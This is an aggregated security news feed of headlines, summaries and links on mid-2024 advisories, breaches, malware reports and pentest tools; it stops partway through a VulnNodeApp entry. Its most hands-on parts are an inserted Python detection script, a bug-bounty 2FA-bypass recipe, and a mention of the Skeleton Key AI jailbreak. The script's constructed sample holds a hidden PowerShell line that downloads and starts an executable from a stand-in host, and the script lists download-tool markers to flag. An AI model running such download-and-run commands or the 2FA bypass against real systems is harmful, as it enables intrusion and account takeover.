I aggregated the statistics created from the cyber attacks timelines published in the first quarter of 2024. In this period, I collected a total of 833 events (9.15 events/day) dominated by Cyber Crime with 75.2%...
https://www.hackmageddon.com/2024/07/09/q1-2024-cyber-attacks-statistics/

5 common Ticketmaster scams: How fraudsters steal the show
Scammers gonna scam scam scam, so before hunting for your tickets to a Taylor Swift gig or other in-demand events, learn how to stop fraudsters from leaving a blank space in your bank account
https://www.welivesecurity.com/en/scams/5-common-ticketmaster-scams-fraudsters-steal-show/

Cross site scripting vulnerability in SSL VPN web UI
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiOS and FortiProxy's web SSL VPN UI may allow a remote unauthenticated attacker to perform a Cross-Site Scripting attack by social engineering the targeted user into bookmarking a malicious Samba server, then opening the bookmark.
https://fortiguard.fortinet.com/psirt/FG-IR-23-485

FortiAIOps - CSV Injection in export device inventory feature
An improper neutralization of formula elements in a CSV File vulnerability [CWE-1236] in FortiAIOps may allow a remote authenticated attacker to execute arbitrary commands on a client's workstation via poisoned CSV reports.
https://fortiguard.fortinet.com/psirt/FG-IR-24-073

FortiAIOps - Cross-site request forgery
Multiple cross-site request forgery (CSRF) vulnerabilities [CWE-352] in FortiAIOps may allow an unauthenticated remote attacker to perform arbitrary actions on behalf of an authenticated user by tricking the victim into executing malicious GET requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-070

FortiAIOps - Improper Session Management
Multiple insufficient session expiration vulnerabilities [CWE-613] in FortiAIOps may allow an attacker to re-use stolen old session tokens to perform unauthorized operations via crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-069

FortiAIOps - Sensitive Information leak to an Unauthorized Actor
Multiple exposure of sensitive information to an unauthorized actor vulnerabilities [CWE-200] in FortiAIOps may allow an authenticated attacker to retrieve sensitive information from the API endpoint or logs.
https://fortiguard.fortinet.com/psirt/FG-IR-24-072

FortiOS - IP address validation mishandles zero characters
An incorrect parsing of numbers with different radices vulnerability [CWE-1389] in FortiOS and FortiProxy IP address validation feature may permit an unauthenticated attacker to bypass the IP blocklist via crafted requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-446

Improper access control vulnerability in administrative interface
An improper access control vulnerability [CWE-284] in FortiADC may allow a read-only authenticated attacker to perform some write actions via crafted HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-23-469

Insecure Direct Object Reference in policy API Endpoint
An authorization bypass through user-controlled key vulnerability [CWE-639] in the FortiPortal organization interface may allow an authenticated attacker to view resources of other organizations via HTTP or HTTPS requests.
https://fortiguard.fortinet.com/psirt/FG-IR-24-011

Multiple lack of client-side certificate validation when establishing secure connections
An improper certificate validation vulnerability [CWE-295] in FortiADC may allow a remote and unauthenticated attacker to perform a Man-in-the-Middle attack on the communication channel between the device and various remote servers such as private SDN connectors and FortiToken Cloud.
https://fortiguard.fortinet.com/psirt/FG-IR-22-298

OpenSSH regreSSHion Attack (CVE-2024-6387)
CVE-2024-6387: A signal handler race condition was found in OpenSSH's server (sshd). If a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example syslog(). This could lead to remote code execution with root privileges.
https://fortiguard.fortinet.com/psirt/FG-IR-24-258

Privilege escalation from low privilege administrator
An improper access control vulnerability [CWE-284] in FortiExtender authentication component may allow a remote authenticated attacker to create users with elevated privileges via a crafted HTTP request.
https://fortiguard.fortinet.com/psirt/FG-IR-23-459

A Simple 2FA Bypass
2FA bypass through response manipulation. Two-Factor Authentication (2FA) serves as a robust shield against unauthorized access. However, during a recent engagement in a RVDP, I found a critical vulnerability that allows an attacker to bypass 2FA using response manipulation. Bug-bounty (zoom.us). Below are the steps that led to bypass 2FA: 1. I logged in as a normal user and enabled 2FA for that account. 2. Next, I logged out and logged in again with login credentials. 3. Then I entered the wrong OTP and captured the response to that request as shown below (Wrong OTP Response). 4. The response had 401 Unauthorized and the body had a wrong OTP message. 5. I manipulated the response code to 200 OK and replaced the body with the content of a valid OTP (Manipulated Response). 6. That's it, with this I was able to bypass...
https://infosecwriteups.com/a-simple-2fa-bypass-43c8af9006ec?source=rss----7b722bfd1b8d---4

Data Profiling Reveals Why 39+ U.S. States Banned TikTok
Data Profiling Reveals Reasons Behind Over 39 States of USA Banning Chinese Tik-Tok App. There is only one reason why more than 39 states of the USA have banned Tik-Tok by issuing official orders: the resolution to end this app's involvement in suspicious activity and data piracy. This app has allegedly stolen USA state citizens' data (according to Forbes) without their knowledge. Initially considered merely an allegation possibly related to the trade war, this accusation gained more credibility when it was realised that TikTok is operated in a country where citizen data is considered irrelevant. While this news may suffice for the average person, the intellectually curious undoubtedly wonder how. I will end your doubt on one condition: read this article until the end. Disclaimer: Neither...
https://infosecwriteups.com/data-profiling-reveals-why-39-u-s-states-banned-tiktok-4c64f968af7b?source=rss----7b722bfd1b8d---4

BountyDork: Your Ultimate Automatic Dorking Testing Companion For Bug Bounty
Discover BountyDork, a powerful tool designed for penetration testers and cybersecurity researchers, offering automation, reporting, and… Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/bountydork-your-ultimate-automatic-dorking-testing-companion-for-bug-bounty-b2bd41cb7344?source=rss----7b722bfd1b8d---4

RegreSSHion (CVE-2024-6387): Dive into the Latest OpenSSH Server Threat
Explore CVE-2024-6387, a critical cybersecurity vulnerability. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/regresshion-cve-2024-6387-dive-into-the-latest-openssh-server-threat-ba4a6e0983e4?source=rss----7b722bfd1b8d---4

Do You Need To Know Coding In Cloud Security?
My take on this commonly asked question. Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/do-you-need-to-know-coding-in-cloud-security-3ee686c0c814?source=rss----7b722bfd1b8d---4

Step-by-Step Guide on How to Hack Phone Remotely
In the age of digital sophistication, questions like how to hack a phone or understanding the underlying vulnerabilities are becoming increasingly prevalent. With the evolution of technology, hacking techniques have become more sophisticated, targeting not just the individual's personal data but also encompassing malware attacks, phishing attempts, and unauthorized GPS tracking. This interest is often driven by concerns over security, a desire to understand potential risks, and the mechanisms to protect against them. It's crucial, however, to approach this information with an understanding of the ethical implications and strictly for educational purposes. This guide will delve into the essentials of how to hack a phone remotely, laying down a step-by-step...
https://infosecwriteups.com/step-by-step-guide-on-how-to-hack-phone-remotely-a8b1b8d13015?source=rss----7b722bfd1b8d---4

Enabling Reproducible and Verification of Time to Network Protocol Testing
Discover the “Network Simulator-centric Compositional Testing” (NSCT) methodology, a groundbreaking approach destined to transform network… Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/unveiling-nsct-a-breakthrough-in-network-protocol-testing-b2356c2c7d70?source=rss----7b722bfd1b8d---4

Art of finding zero day vulnerabilities using Open Source AI
I am Harish SG, a security researcher studying for a Master's in Cybersecurity at UT Dallas and an AI security engineer at Cisco, who previously hunted on the Microsoft Bug Bounty Program and Google VRP. I am sharing this article for security awareness and educational purposes only, and I am sharing only personal opinions; none of these are related to my work at Cisco. In this article I am gonna share how I used an open-source AI model finetuned for finding vulnerabilities, called CodeAstra-7B, to identify zero-day vulnerabilities in various open-source projects such as Apache Pulsar, Apache Airflow, Apache Cocoon, TensorFlow, ImageMagick etc., and how to build a framework which combines both static analysis tools such as Semgrep and AI agents built on top of open-source models such as CodeAstra-7B to find...
https://infosecwriteups.com/art-of-finding-zero-day-vulnerabilities-using-open-source-ai-e26eaaf323cb?source=rss----7b722bfd1b8d---4

Unlocking Kubernetes Security: The Complete Checklist
Kubernetes has quickly become the go-to system for managing containerized apps, making it a massive playground for both deploying cool apps and, unfortunately, encountering some not-so-cool security gaps. In this write-up, we're going to explore the world of Kubernetes pentesting, presenting a comprehensive checklist that serves as your guiding light through the dark corners of Kubernetes environments. Entry Points into the cluster: the Kubernetes API server is the main point of entry to a cluster for external parties. 1) NodePort and LoadBalancer Service ▶ k get svc -A. 2) hostPort ▶ k describe pod <pod> (pods can be directly exposed via hostPort; this is not the recommended way of exposing a pod). 3) Ingress Paths ▶ kubectl get ingress -A -o=jsonpath='{range .items[*]}{@.metadata.name}{"\n"}{range...
https://infosecwriteups.com/unlocking-kubernetes-security-the-complete-checklist-538fff3adacf?source=rss----7b722bfd1b8d---4

DORA: What You Need to Know
Learn about DORA, the new EU regulation for digital operational resilience, and how to meet the requirements with pentesting.
https://www.hackerone.com/penetration-testing/dora

What You Need to Know About the EU Cyber Resilience Act
Understand what the CRA entails and how to comply.
https://www.legitsecurity.com/blog/what-you-need-to-know-about-the-eu-cyber-resilience-act

New APT Group "CloudSorcerer" Targets Russian Government Entities

https://www.proofpoint.com/us/newsroom/news/new-apt-group-cloudsorcerer-targets-russian-government-entities

Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […] The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors

CloudSorcerer – A new APT targeting Russian government entities
Kaspersky discovered a new APT CloudSorcerer targeting Russian government entities and using cloud services as C2, just like the CloudWizard actor.
https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/

Husky Owners - 16,502 breached accounts
In July 2024, the Husky Owners forum website was defaced and linked to a breach of user data containing 16k records. The exposed data included usernames, email addresses, dates of birth and time zones.
https://haveibeenpwned.com/PwnedWebsites#HuskyOwners

FNTECH - 10,386 breached accounts
In July 2024, the events management platform FNTECH suffered a data breach that exposed 10k unique email addresses. The data contained registrants from various events, including participants of the Roblox Developer Conference registration list. The data also included names and IP addresses.
https://haveibeenpwned.com/PwnedWebsites#RobloxDeveloperConference2024

MSSQL for Pentester: Command Execution with xp_cmdshell
Transact-SQL (T-SQL) is an extension of the SQL language used primarily in Microsoft SQL Server. T-SQL expands the functionality of SQL by adding procedural programming The post MSSQL for Pentester: Command Execution with xp_cmdshell appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/

Kimsuky Group's New Backdoor (HappyDoor)
Table of Contents This report is a summarized version of “Analysis Report of Kimsuky Group’s HappyDoor Malware” introduced in AhnLab Threat Intelligence Platform (TIP), containing key information for analyzing breaches. The report in AhnLab TIP includes details on encoding & encryption methods, packet structure, and more in addition to the characteristics and features of the malware. In particular, it also provides an IDA plugin and a backdoor test server developed by AhnLab for the convenience of analysts. Note that the masked... The post Kimsuky Group’s New Backdoor (HappyDoor) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67660/

What HackerOne Customers Say About Remediating Vulnerabilities and Getting the Best Results From Hackers
Learn how HackerOne customers remediate vulnerabilities and get the best results and value from ethical hackers.
https://www.hackerone.com/customer-stories/get-the-most-from-hackers

Social media and teen mental health – Week in security with Tony Anscombe
Social media sites are designed to make their users come back for more. Do laws restricting children's exposure to addictive social media feeds have teeth or are they a political gimmick?
https://www.welivesecurity.com/en/videos/social-media-teen-mental-health-week-security-tony-anscombe/

Polyfill.io Supply Chain Attack
What is the attack? Over 100,000+ sites have been impacted by a supply chain attack involving the Polyfill.io service. Polyfill is a popular tool used for enhancing browser capabilities by hundreds of thousands of sites to ensure that all website visitors can use the same codebase for unsupported functionality. Earlier this year, the polyfill.io domain was purchased, and the script was modified to redirect users to malicious and scam sites. What is the recommended mitigation? Given the confirmed malicious operations, owners of websites using polyfill.io are advised to remove it immediately and search their code repositories for instances of polyfill.io. Users are also advised to consider using alternate services provided by Cloudflare and Fastly. What FortiGuard coverage is available? Fortinet's...
https://fortiguard.fortinet.com/threat-signal-report/5478

Attack Cases Against HTTP File Server (HFS) (CVE-2024-23692)
HTTP File Server (HFS) is a program that provides a simple type of web service. Because it can provide web services with just an executable file without having to build a web server, it is often used for sharing files, allowing users to connect to the address through web browsers and easily download files. Because HFS is exposed to the public in order to enable users to connect to the HFS web server and download files, it can be a... The post Attack Cases Against HTTP File Server (HFS) (CVE-2024-23692) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67650/

Linux Defense Evasion Techniques Detected by AhnLab EDR (2)
The blog post “Linux Defense Evasion Techniques Detected by AhnLab EDR (1)” [1] covered methods where the threat actors and malware strains attacked Linux servers before incapacitating security services such as firewalls and security modules and then concealing the installed malware. This post will cover additional defense evasion techniques against Linux systems not covered in the past post. For example, methods of concealing malware include having the running malware delete itself to not be noticed by an administrator, or deleting... The post Linux Defense Evasion Techniques Detected by AhnLab EDR (2) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67636/

Dissecting GootLoader With Node.js
We demonstrate effective methods to circumvent anti-analysis evasion techniques from GootLoader, a backdoor and loader malware distributed through fake forum posts. The post Dissecting GootLoader With Node.js appeared first on Unit 42.
https://unit42.paloaltonetworks.com/javascript-malware-gootloader/

The Not-So-Secret Network Access Broker x999xx
Most accomplished cybercriminals go out of their way to separate their real names from their hacker handles. But among certain old-school Russian hackers it is not uncommon to find major players who have done little to prevent people from figuring out who they are in real life. A case study in this phenomenon is "x999xx," the nickname chosen by a venerated Russian hacker who specializes in providing the initial network access to various ransomware groups.
https://krebsonsecurity.com/2024/07/the-not-so-secret-network-access-broker-x999xx/

Does your business have an AI blind spot? Navigating the risks of shadow AI
With AI now an integral part of business operations, shadow AI has become the next frontier in information security. Here’s what that means for managing risk. For many organizations, 2023 was the breakout year for generative AI. Now, large language models (LLMs) like ChatGPT have become household names. In the business world, they’re already deeply […] The post Does your business have an AI blind spot? Navigating the risks of shadow AI appeared first on Security Intelligence.
https://securityintelligence.com/articles/does-your-business-have-ai-blind-spot/

Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
This threat brief details CVE-2024-6387, called RegreSSHion, an RCE vulnerability affecting connectivity tool OpenSSH servers on glibc-based Linux systems. The post Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-brief-cve-2024-6387-openssh/

Vulnerabilities in PanelView Plus devices could lead to remote code execution
Microsoft discovered and responsibly disclosed two vulnerabilities in Rockwell's PanelView Plus that could be remotely exploited by unauthenticated attackers, allowing them to perform remote code execution (RCE) and denial-of-service (DoS). PanelView Plus devices are graphic terminals, which are known as human machine interface (HMI) and are used in the industrial space. The post Vulnerabilities in PanelView Plus devices could lead to remote code execution appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/02/vulnerabilities-in-panelview-plus-devices-could-lead-to-remote-code-execution/

It all adds up: Pretexting in executive compromise
Executives hold the keys to the corporate kingdom. If attackers can gain the trust of executives using layered social engineering techniques, they may be able to access sensitive corporate information such as intellectual property, financial data or administrative control logins and passwords. While phishing remains the primary pathway to executive compromise, increasing C-suite awareness of […] The post It all adds up: Pretexting in executive compromise appeared first on Security Intelligence.
https://securityintelligence.com/articles/pretexting-in-executive-compromise-social-engineering/

Strategies to accelerate dependency management for modern enterprise software development
Contrary to common belief, security and productivity are not necessarily at odds in modern software development.
https://www.sonatype.com/blog/strategies-to-accelerate-dependency-management-for-modern-enterprise-software-development

March 2024 Cyber Attacks Statistics
In March 2024 I collected and analyzed 203 events dominated by malware attacks. Cyber Crime continued to lead the Motivations chart with 72.9%, ahead of Cyber Espionage with 13.3%, Cyber Warfare (5.9%) and Hacktivism (2.5%).
https://www.hackmageddon.com/2024/07/02/march-2024-cyber-attacks-statistics/

Operation Endgame: The ultimate troll patrol.

https://www.proofpoint.com/us/newsroom/news/operation-endgame-ultimate-troll-patrol

SAML Raider Release 2.0.0
SAML Raider is a Burp Suite extension and the tool of choice for many pentesters when testing SAML infrastructures. This blog post gives a brief introduction to what has changed in the new version 2.0.0, from developer and user experience improvements to bug fixes.
https://blog.compass-security.com/2024/07/saml-raider-release-2-0-0/

ChatGPT 4 can exploit 87% of one-day vulnerabilities
Since the widespread and growing use of ChatGPT and other large language models (LLMs) in recent years, cybersecurity has been a top concern. Among the many questions, cybersecurity professionals wondered how effective these tools were in launching an attack. Cybersecurity researchers Richard Fang, Rohan Bindu, Akul Gupta and Daniel Kang recently performed a study to […] The post ChatGPT 4 can exploit 87% of one-day vulnerabilities appeared first on Security Intelligence.
https://securityintelligence.com/articles/chatgpt-4-exploits-87-percent-one-day-vulnerabilities/

Strengthening Microsoft 365 with Human-centric Security

https://www.proofpoint.com/us/newsroom/news/strengthening-microsoft-365-human-centric-security

Xctdoor Malware Used in Attacks Against Korean Companies (Andariel)
AhnLab SEcurity intelligence Center (ASEC) recently discovered a case where an unidentified threat actor exploited a Korean ERP solution to carry out an attack. After infiltrating the system, the threat actor is believed to have attacked the update server of a specific Korean ERP solution to take control of systems within the company. In another attack case, a vulnerable web server was attacked to distribute malware. The targets of these attacks have been identified as the Korean defense and manufacturing... The post Xctdoor Malware Used in Attacks Against Korean Companies (Andariel) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67558/

Introducing HackerOne's Hai API: Revolutionize Your Workflow Automation with AI
Learn about Hai API: designed specifically for customers seeking efficient interaction and automation capabilities.
https://www.hackerone.com/ai/hai-api

What Is Application Security Posture Management (ASPM): A Comprehensive Guide
Get details on what ASPM is, the problems it solves, and what to look for.  
https://www.legitsecurity.com/blog/what-is-application-security-posture-management-aspm

The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention
Our novel contrastive credibility propagation algorithm improves on data loss prevention and has unique applications to sensitive material. The post The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention appeared first on Unit 42.
https://unit42.paloaltonetworks.com/contrastive-credibility-propagation/

16-31 March 2024 Cyber Attacks Timeline
In the second timeline of March 2024 I collected 104 events dominated by malware, exploitation of vulnerabilities and ransomware. The threat landscape was also characterized by several mega breaches, multiple cyber espionage operations and also some remarkable events related to cyber warfare.
https://www.hackmageddon.com/2024/06/28/16-31-march-2024-cyber-attacks-timeline/

Ticketek - 17,643,173 breached accounts
In May 2024, the Australian event ticketing company Ticketek reported a data breach linked to a third party cloud-based platform. The following month, the data appeared for sale on a popular hacking forum and was later linked to a series of breaches of the Snowflake cloud storage service. The data contained almost 30M rows with 17.6M unique email addresses alongside names, genders, dates of birth and hashed passwords.
https://haveibeenpwned.com/PwnedWebsites#Ticketek

Sustaining Digital Certificate Security - Entrust Certificate Distrust
Posted by Chrome Root Program, Chrome Security Team. The Chrome Security Team prioritizes the security and privacy of Chrome's users, and we are unwilling to compromise on these values. The Chrome Root Program Policy states that CA certificates included in the Chrome Root Store must provide value to Chrome end users that exceeds the risk of their continued inclusion. It also describes many of the factors we consider significant when CA Owners disclose and respond...
http://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html

Virtual Escape; Real Reward: Introducing Google's kvmCTF
Marios Pomonis, Software Engineer. Google is committed to enhancing the security of open-source technologies, especially those that make up the foundation for many of our products, like Linux and KVM. To this end we are excited to announce the launch of kvmCTF, a vulnerability reward program (VRP) for the Kernel-based Virtual Machine (KVM) hypervisor, first announced in October 2023. KVM is a robust hypervisor with over 15 years of open-source development and is widely used throughout the consumer and enterprise landscape, including platforms such as Android and Google Cloud. Google is an active contributor to the project and we designed kvmCTF as a collaborative way to help identify & remediate vulnerabilities and further harden this fundamental security boundary. Similar to kernelCTF,...
http://security.googleblog.com/2024/06/virtual-escape-real-reward-introducing.html

The Windows Registry Adventure #3: Learning resources
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html

Software composition analysis (SCA): A beginner's guide
In modern software development, applications are rarely built from scratch. Development teams extensively rely upon open source software components to accelerate development and foster innovation in software supply chains.
https://www.sonatype.com/blog/software-composition-analysis-sca-a-beginners-guide

New InnoSetup Malware Created Upon Each Download Attempt
AhnLab SEcurity intelligence Center (ASEC) has discovered the distribution of a new type of malware disguised as cracks and commercial tools. Unlike past malware, which performed malicious behaviors immediately upon execution, this malware displays an installer UI, and the malicious behaviors are executed when buttons are clicked during the installation process. The malware appears to be generated on the fly in response to each download request rather than distributed as a pre-built file. This means that... The post New InnoSetup Malware Created Upon Each Download Attempt appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67502/

DBatLoader Distributed via CMD Files
AhnLab SEcurity intelligence Center (ASEC) has recently discovered malware being distributed through CMD files and identified it as a downloader called DBatLoader (ModiLoader), which had previously been distributed via phishing emails as RAR archives containing an EXE file. The file began with the bytes "FF FE", the byte-order mark for UTF-16LE, so when the script was opened in a text editor its contents were not displayed correctly. However, if the "FF FE" bytes are deleted or the file is converted to UTF-8, the... The post DBatLoader Distributed via CMD Files appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67468/
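The BOM trick described above is easy to undo programmatically. The following is an added example, not code from the ASEC post: it detects a leading byte-order mark on a script file, decodes the script to readable text (the equivalent of converting it to UTF-8), and flags the lines that fetch or launch a payload. The sample CMD script, the marker list and the example.invalid host are constructed for the example.

```python
"""Added example, not from the ASEC post: recover a CMD script whose leading UTF-16LE
byte-order mark (FF FE) keeps a plain text editor from showing its contents, then
flag the lines that fetch or launch a payload. The sample script is constructed."""
import codecs
import sys

# Longest BOMs first, so UTF-32LE (FF FE 00 00) is not mistaken for UTF-16LE (FF FE).
BOMS = [
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF8, "utf-8"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
]


def detect_bom(data: bytes):
    """Return (bom, codec) for a leading byte-order mark, or (b'', 'utf-8') if none."""
    for bom, codec in BOMS:
        if data.startswith(bom):
            return bom, codec
    return b"", "utf-8"


def decode_script(data: bytes) -> str:
    """Strip the BOM and decode, which is what converting the file to UTF-8 achieves."""
    bom, codec = detect_bom(data)
    return data[len(bom):].decode(codec, errors="replace")


# Strings that usually mark a download-and-execute stage in a loader script (assumed list).
MARKERS = ("powershell", "certutil", "bitsadmin", "mshta", "curl ", "http://", "https://", "start ")


def suspicious_lines(text: str):
    """Lines of the decoded script that contain any of the markers above."""
    return [line.strip() for line in text.splitlines()
            if any(m in line.lower() for m in MARKERS)]


# Constructed sample: a UTF-16LE CMD file carrying the BOM that hides it from editors.
SAMPLE_CMD = codecs.BOM_UTF16_LE + (
    "@echo off\r\n"
    'powershell -w hidden -c "iwr http://example.invalid/a.exe -o %TEMP%\\a.exe"\r\n'
    "start %TEMP%\\a.exe\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CMD
    bom, codec = detect_bom(raw)
    print(f"BOM {bom.hex() or 'none'} -> {codec}")
    for line in suspicious_lines(decode_script(raw)):
        print("suspicious:", line)
```

Run it with a path to a .cmd file to decode and triage that file; without arguments it runs on the constructed sample. The decoded text is what a SIEM search or YARA rule should be run against, since the raw UTF-16LE bytes will not match ASCII patterns.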

Mitigating Skeleton Key, a new type of generative AI jailbreak technique
Microsoft recently discovered a new type of generative AI jailbreak method called Skeleton Key that could impact the implementations of some large and small language models. This new method has the potential to subvert either the built-in model safety or platform safety systems and produce any content. It works by learning and overriding the intent of the system message to change the expected behavior and achieve results outside of the intended use of the system. The post Mitigating Skeleton Key, a new type of generative AI jailbreak technique appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/26/mitigating-skeleton-key-a-new-type-of-generative-ai-jailbreak-technique/

Working with a cybersecurity committee of the board
Learn about the rise of cybersecurity committees and how the CISO and IT security team can work with them to produce the best result for the organization's IT security and enable digital transformation. The post Working with a cybersecurity committee of the board appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/26/working-with-a-cybersecurity-committee-of-the-board/

Polyfill.io supply chain attack hits 100,000+ websites — all you need to know
In a significant supply chain attack, over 100,000 websites using Polyfill[.]io, a popular JavaScript CDN service, were compromised.
https://www.sonatype.com/blog/polyfill.io-supply-chain-attack-hits-100000-websites-all-you-need-to-know

Exploit creator selling 250+ reserved npm packages on Telegram
Recently, the Sonatype Security Research team identified more than 250 reserved npm packages that would make lucrative and convincing attack packages, because they are named exactly like open source projects from Amazon Web Services (AWS), Microsoft, React, CKEditor and other popular names.
https://www.sonatype.com/blog/exploit-creator-selling-250-reserved-npm-packages-via-telegram

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing: gathering information before any real attacks are planned. Ashok is a fast recon tool for penetration testers, designed specifically for the reconnaissance phase. Ashok v1.1 adds an advanced Google dorker and a Wayback crawling machine. Main features: Wayback Crawler Machine; Google Dorking without limits; GitHub information grabbing; subdomain identifier; CMS/technology detector with custom headers. Installation:
git clone https://github.com/ankitdobhal/Ashok
cd Ashok
python3 -m pip install -r requirements.txt
How to use Ashok? A detailed usage guide is available in the Usage section of the wiki, but an index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html

America's drinking water is facing attack, with links back to China, Russia and Iran

https://www.proofpoint.com/us/newsroom/news/americas-drinking-water-facing-attack-links-back-china-russia-and-iran

Maven Central and the tragedy of the commons
The tragedy of the commons is a concept in economics and ecology that describes a situation where individuals, acting in their own self-interest, collectively deplete a shared resource. In simpler terms, it's the idea that when a resource is available to everyone without restriction, some individuals tend to overuse it, leading to its eventual depletion and harming everyone in the long run. In the case of Maven Central, we are experiencing an unwitting tyranny by the few.
https://www.sonatype.com/blog/maven-central-and-the-tragedy-of-the-commons

Attackers Exploiting Public Cobalt Strike Profiles
Unit 42 researchers examine how attackers use publicly available Malleable C2 profiles, examining their structure to reveal evasive techniques. The post Attackers Exploiting Public Cobalt Strike Profiles appeared first on Unit 42.
https://unit42.paloaltonetworks.com/attackers-exploit-public-cobalt-strike-profiles/

How to boost your incident response readiness
Discover key steps to bolster incident response readiness, from disaster recovery plans to secure deployments, guided by insights from the Microsoft Incident Response team. The post How to boost your incident response readiness appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/25/how-to-boost-your-incident-response-readiness/

Hacking for Defenders: approaches to DARPA's AI Cyber Challenge
Oliver Chang, Jonathan Metzman, OSS-Fuzz and Alex Rebert, Security Engineering. The US Defense Advanced Research Projects Agency, DARPA, recently kicked off a two-year AI Cyber Challenge (AIxCC), inviting top AI and cybersecurity experts to design new AI systems to help secure major open source projects which our critical infrastructure relies upon. As AI continues to grow, it's crucial to invest in AI tools for Defenders, and this competition will help advance technology to do so. Google's OSS-Fuzz and Security Engineering teams have been excited to assist AIxCC organizers in designing their challenges and competition framework. We also playtested the competition by building a Cyber Reasoning System (CRS) tackling DARPA's exemplar challenge. This blog post will share our approach...
http://security.googleblog.com/2024/06/hacking-for-defenders-approaches-to.html

CloudBrute - Awesome Cloud Enumerator
A tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available here. Motivation: we are always thinking of something we can automate to make black-box security testing easier. We discussed the idea of creating a multi-platform cloud brute-force hunter, mainly to find open buckets, apps, and databases hosted on the clouds, and possibly apps behind proxy servers. Here is the list of issues with previous approaches that we tried to fix: separate wordlists; lack of proper concurrency; lack of support for all major cloud providers; requiring authentication, keys, or cloud CLI access...
http://www.kitploit.com/2024/06/cloudbrute-awesome-cloud-enumerator.html

Cybersecurity in the SMB space — a growing threat
Kaspersky analysts explain which applications are targeted the most, and how enterprises can protect themselves from phishing and spam.
https://securelist.com/smb-threat-report-2024/113010/

Hfinger - Fingerprinting HTTP Requests
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-) Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable. Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted...
http://www.kitploit.com/2024/06/hfinger-fingerprinting-http-requests.html

Fake software fixes fuel money-stealing malware threat

https://www.proofpoint.com/us/newsroom/news/fake-software-fixes-fuel-money-stealing-malware-threat

XZ backdoor: Hook analysis
In this article, we analyze the XZ backdoor's behavior inside OpenSSH after it has hooked the RSA-related functions.
https://securelist.com/xz-backdoor-part-3-hooking-ssh/113007/

Advance Auto Parts - 79,243,727 breached accounts
In June 2024, Advance Auto Parts confirmed they had suffered a data breach which was posted for sale to a popular hacking forum. Linked to unauthorised access to Snowflake cloud services, the breach exposed a large number of records related to both customers and employees. In total, 79M unique email addresses were included in the breach, alongside names, phone numbers, addresses and further data attributes related to company employees.
https://haveibeenpwned.com/PwnedWebsites#AdvanceAutoParts

DORA ICT risk management framework: What to know
The Digital Operational Resilience Act, or DORA, focuses on limiting how disruptive cyberattacks are to financial institutions. One of its key characteristics is that it views open source analysis, also known as software composition analysis (SCA), as a basic security requirement that all institutions under its guidance must develop as a capability.
https://www.sonatype.com/blog/dora-ict-risk-management-framework-what-to-know

VulnNodeApp - A Vulnerable Node.Js Application
A vulnerable application built using Node.js, the Express server and the EJS template engine. This application is meant for educational purposes only. Setup: clone this repository:
git clone https://github.com/4auvar/VulnNodeApp.git
Application setup: install the latest Node.js version with npm. Open a terminal/command prompt, navigate to the location of the downloaded/cloned repository and run:
npm install
DB setup: install and configure the latest MySQL version and start the MySQL service/daemon. Log in as the root user in MySQL and run the SQL script below:
